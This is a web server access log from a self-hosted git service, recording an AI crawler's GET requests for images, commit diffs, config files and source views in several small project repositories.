"/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 1094909] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:14:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:14:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1642848] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:14:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275170] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:14:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269881] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692379] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641829] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508484] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699423] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498858] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429964] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" +[17/Feb/2026:14:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" +[17/Feb/2026:14:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 316206] [Gzip 14.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 288703] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" +[17/Feb/2026:14:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 13002] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets" [Client 74.7.227.38] [Length 29962] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 22220] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 11438] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" +[17/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main" [Client 74.7.227.38] [Length 12827] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:14:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2fbearing.png" [Client 74.7.227.38] [Length 19827] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" +[17/Feb/2026:14:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 22248] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:14:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2freactor.png" [Client 74.7.227.38] [Length 19830] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +[17/Feb/2026:14:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2ftsconfig.json" [Client 74.7.227.38] [Length 23674] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:14:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fpackage.json" [Client 74.7.227.38] [Length 23534] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:14:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12785] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:14:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fmetadata.json" [Client 74.7.227.38] [Length 22934] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:14:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 27965] [Gzip 6.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" +[17/Feb/2026:14:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72691] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:14:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72651] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:14:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 74.7.227.38] [Length 11274] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:14:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 74.7.227.38] [Length 11449] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:14:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup" [Client 74.7.227.38] [Length 11443] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:14:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts?display=source" [Client 74.7.227.38] [Length 11502] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" +[17/Feb/2026:14:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" +[17/Feb/2026:14:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" +[17/Feb/2026:14:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" +[17/Feb/2026:14:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" +[17/Feb/2026:14:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 